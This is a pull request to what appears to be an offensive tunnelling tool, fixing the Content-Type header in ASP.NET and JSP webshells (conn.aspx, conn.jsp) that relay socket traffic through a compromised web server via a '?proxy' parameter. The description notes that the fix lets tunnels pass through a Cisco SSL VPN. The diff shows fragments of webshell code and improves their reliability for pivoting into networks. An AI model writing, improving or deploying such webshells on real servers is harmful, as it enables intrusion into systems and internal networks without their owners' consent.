### PR TITLE
Solves ContentType issue in webshells.

### DIFF
--- a/webshells/conn.aspx
+++ b/webshells/conn.aspx
@@ -168,7 +168,7 @@ if (Request.Url.Query.StartsWith("?proxy")){				//XXX:Stupid hack but works
 				return;
 				}
 			}
-		else{									
+		else{
 			Socket socket = Session["socket"] as Socket;
 			
 			//Read data from request and write to socket
@@ -189,7 +189,7 @@ if (Request.Url.Query.StartsWith("?proxy")){				//XXX:Stupid hack but works
 					//Welcome to C trim
 					byte[] received = new byte[bytesRead];
 					Array.Copy(receiveBuffer, received , bytesRead);
-					
+					Response.ContentType = "application/octet-stream";
 					Response.BinaryWrite(received);
 					}
 				else {

--- a/webshells/conn.jsp
+++ b/webshells/conn.jsp
@@ -192,9 +192,9 @@ if(request.getParameter("proxy") == "" ){
 			return;
 			}
 		else{
-			response.setContentType("application/oclet-stream");
+			response.setContentType("application/octet-stream");
 			//Allocate buffers for socket IO
-			ByteBuffer dataIn = ByteBuffer.allocate(bufferSize);		
+			ByteBuffer dataIn = ByteBuffer.allocate(bufferSize);
 			ByteBuffer dataOut = ByteBuffer.allocate(bufferSize);
 			
 			try{


### PR DESCRIPTION
Added missing ContentType-Header `application/octet-stream` in ASP.NET webshell and fixed related typo in JSP webshell. E.g. a tunnel through a Cisco SSL VPN would not work without that fix.